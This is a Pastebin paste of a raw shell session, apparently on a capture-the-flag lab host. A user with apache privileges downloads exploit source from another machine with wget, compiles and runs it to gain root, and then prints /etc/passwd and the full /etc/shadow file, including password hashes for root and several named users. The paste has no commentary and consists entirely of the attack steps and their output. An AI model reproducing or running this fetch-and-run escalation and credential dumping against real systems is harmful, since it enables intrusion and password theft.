API tools faq
paste
Advertisement
Guest User

bashrc nullcon

a guest
Jan 17th, 2012
426
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.67 KB | None | 0 0
raw download clone embed print report
  1. sh: no job control in this shell
  2. sh-3.1$ id
  3. uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_sys_script_t
  4. sh-3.1$ uname -a
  5. Linux ctf4.sas.upenn.edu 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
  6. sh-3.1$ cd /tmp/
  7. sh-3.1$ ls -la
  8. total 904
  9. drwxrwxrwt 15 root root 4096 Jan 11 10:07 .
  10. drwxr-xr-x 23 root root 4096 Jan 11 09:38 ..
  11. drwxrwxrwt 2 root root 4096 Jan 11 07:15 .ICE-unix
  12. -r--r--r-- 1 root root 11 Jan 11 07:07 .X0-lock
  13. drwxrwxrwt 2 root root 4096 Jan 11 07:07 .X11-unix
  14. drwxrwxrwt 2 root root 4096 Jan 11 07:06 .font-unix
  15. srw-rw-rw- 1 root root 0 Jan 11 07:07 .gdm_socket
  16. drwx------ 2 root root 4096 Mar 6 2009 .mozilla
  17. -rw-rw-rw- 1 mysql mysql 13 Jan 11 09:57 1.txt
  18. -rw-rw-rw- 1 mysql mysql 36 Jan 11 09:58 2.txt
  19. drwx------ 2 achen achen 4096 Mar 10 2009 gconfd-achen
  20. drwx------ 2 dstevens dstevens 4096 Mar 11 2009 gconfd-dstevens
  21. drwx------ 2 ghighland ghighland 4096 Mar 10 2009 gconfd-ghighland
  22. drwx------ 2 root root 4096 Mar 18 2009 gconfd-root
  23. drwx------ 3 sorzek sorzek 4096 Jan 11 07:15 gconfd-sorzek
  24. drwx------ 2 sorzek sorzek 4096 Jan 11 07:15 keyring-FiP3XI
  25. srwxrwxr-x 1 achen achen 0 Mar 10 2009 mapping-achen
  26. srwxrwxr-x 1 dstevens dstevens 0 Mar 11 2009 mapping-dstevens
  27. srwxrwxr-x 1 ghighland ghighland 0 Mar 10 2009 mapping-ghighland
  28. srwxr-xr-x 1 root root 0 Mar 18 2009 mapping-root
  29. srwxrwxr-x 1 sorzek sorzek 0 Jan 11 07:15 mapping-sorzek
  30. drwx------ 2 sorzek sorzek 4096 Jan 11 07:16 orbit-sorzek
  31. -rwsr-xr-x 1 root root 720888 Jan 11 10:09 sh
  32. drwx------ 2 sorzek sorzek 4096 Jan 11 07:15 ssh-yXwuKb2964
  33. -rw-rw-rw- 1 mysql mysql 13 Jan 11 10:07 test1.txt
  34. -rw-rw-rw- 1 mysql mysql 36 Jan 11 10:07 test2.txt
  35. drwx------ 2 sorzek sorzek 4096 Jan 11 07:15 virtual-sorzek.7IeXOH
  36. -rw------- 1 sorzek sorzek 1062 Jan 11 08:15 xses-sorzek.HeSMY4
  37. sh-3.1$ wget http://192.168.221.130/exploit/9479.c
  38. --10:09:30-- http://192.168.221.130/exploit/9479.c
  39. => `9479.c'
  40. Connecting to 192.168.221.130:80... connected.
  41. HTTP request sent, awaiting response... 200 OK
  42. Length: 3,379 (3.3K) [text/x-csrc]
  43.  
  44. 0K ... 100% 61.97 MB/s
  45.  
  46. 10:09:30 (61.97 MB/s) - `9479.c' saved [3379/3379]
  47.  
  48. sh-3.1$ gcc 9479.c -o root
  49. sh-3.1$ ./root
  50. sh: no job control in this shell
  51. sh-3.1# id
  52. uid=0(root) gid=0(root) groups=48(apache) context=system_u:system_r:httpd_sys_script_t
  53. sh-3.1# cat /etc/passwd
  54. root:x:0:0:root:/root:/bin/bash
  55. bin:x:1:1:bin:/bin:/sbin/nologin
  56. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  57. adm:x:3:4:adm:/var/adm:/sbin/nologin
  58. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  59. sync:x:5:0:sync:/sbin:/bin/sync
  60. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  61. halt:x:7:0:halt:/sbin:/sbin/halt
  62. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  63. news:x:9:13:news:/etc/news:
  64. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  65. operator:x:11:0:operator:/root:/sbin/nologin
  66. games:x:12:100:games:/usr/games:/sbin/nologin
  67. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  68. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  69. nobody:x:99:99:Nobody:/:/sbin/nologin
  70. dbus:x:81:81:System message bus:/:/sbin/nologin
  71. rpm:x:37:37::/var/lib/rpm:/sbin/nologin
  72. apache:x:48:48:Apache:/var/www:/sbin/nologin
  73. distcache:x:94:94:Distcache:/:/sbin/nologin
  74. ntp:x:38:38::/etc/ntp:/sbin/nologin
  75. nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
  76. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  77. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  78. dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
  79. mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
  80. netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
  81. pcap:x:77:77::/var/arpwatch:/sbin/nologin
  82. avahi:x:70:70:Avahi daemon:/:/sbin/nologin
  83. named:x:25:25:Named:/var/named:/sbin/nologin
  84. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  85. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  86. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  87. rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
  88. xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
  89. gdm:x:42:42::/var/gdm:/sbin/nologin
  90. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  91. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  92. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  93. dstevens:x:500:506:Don Stevens:/home/dstevens:/bin/bash
  94. achen:x:501:501:Andrew Chen:/home/achen:/bin/bash
  95. pmoore:x:502:502:Phillip Moore:/home/pmoore:/bin/bash
  96. jdurbin:x:503:503:James Durbin:/home/jdurbin:/bin/bash
  97. sorzek:x:504:504:Sally Orzek:/home/sorzek:/bin/bash
  98. ghighland:x:505:505:Greg Highland:/home/ghighland:/bin/bash
  99. ossec:x:506:508::/var/ossec:/sbin/nologin
  100. ossecm:x:507:508::/var/ossec:/sbin/nologin
  101. ossecr:x:508:508::/var/ossec:/sbin/nologin
  102. sh-3.1# cat /etc/issue
  103. Fedora Core release 5 (Bordeaux)
  104. Kernel \r on an \m
  105.  
  106. sh-3.1# cat /etc/shadow
  107. root:$1$IW2CPQzs$ba/aJ9zePc/r9tF2R6KAJ0:15350:0:99999:7:::
  108. bin:*:14309:0:99999:7:::
  109. daemon:*:14309:0:99999:7:::
  110. adm:*:14309:0:99999:7:::
  111. lp:*:14309:0:99999:7:::
  112. sync:*:14309:0:99999:7:::
  113. shutdown:*:14309:0:99999:7:::
  114. halt:*:14309:0:99999:7:::
  115. mail:*:14309:0:99999:7:::
  116. news:*:14309:0:99999:7:::
  117. uucp:*:14309:0:99999:7:::
  118. operator:*:14309:0:99999:7:::
  119. games:*:14309:0:99999:7:::
  120. gopher:*:14309:0:99999:7:::
  121. ftp:*:14309:0:99999:7:::
  122. nobody:*:14309:0:99999:7:::
  123. dbus:!!:14309:0:99999:7:::
  124. rpm:!!:14309:0:99999:7:::
  125. apache:!!:14309:0:99999:7:::
  126. distcache:!!:14309:0:99999:7:::
  127. ntp:!!:14309:0:99999:7:::
  128. nscd:!!:14309:0:99999:7:::
  129. vcsa:!!:14309:0:99999:7:::
  130. webalizer:!!:14309:0:99999:7:::
  131. dovecot:!!:14309:0:99999:7:::
  132. mysql:!!:14309:0:99999:7:::
  133. netdump:!!:14309:0:99999:7:::
  134. pcap:!!:14309:0:99999:7:::
  135. avahi:!!:14309:0:99999:7:::
  136. named:!!:14309:0:99999:7:::
  137. mailnull:!!:14309:0:99999:7:::
  138. smmsp:!!:14309:0:99999:7:::
  139. haldaemon:!!:14309:0:99999:7:::
  140. rpc:!!:14309:0:99999:7:::
  141. xfs:!!:14309:0:99999:7:::
  142. gdm:!!:14309:0:99999:7:::
  143. rpcuser:!!:14309:0:99999:7:::
  144. nfsnobody:!!:14309:0:99999:7:::
  145. sshd:!!:14309:0:99999:7:::
  146. dstevens:$1$fU8HOHqa$N542xtl0ft8NmsYkv5NFo/:14309:0:99999:7:::
  147. achen:$1$kxyn25Oz$w.MMADGQYIq4F52hi9DUQ.:14309:0:99999:7:::
  148. pmoore:$1$p0RXlomV$m03UsjoTZ08qG8gbWHgST0:14309:0:99999:7:::
  149. jdurbin:$1$CYmEyuc.$FXAeZHkhywwENbqE8h0O.0:14309:0:99999:7:::
  150. sorzek:$1$cWeWNRdU$VTtlKsoRBmhMghnkSwqCQ.:14312:0:99999:7:::
  151. ghighland:$1$ooKvtZEY$N2RpSaIylgFlHnBkbwUGz0:14309:0:99999:7:::
  152. ossec:!!:14312:0:99999:7:::
  153. ossecm:!!:14312:0:99999:7:::
  154. ossecr:!!:14312:0:99999:7:::
  155. sh-3.1# exit
  156. exit
  157. sh-3.1$ exit
  158. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!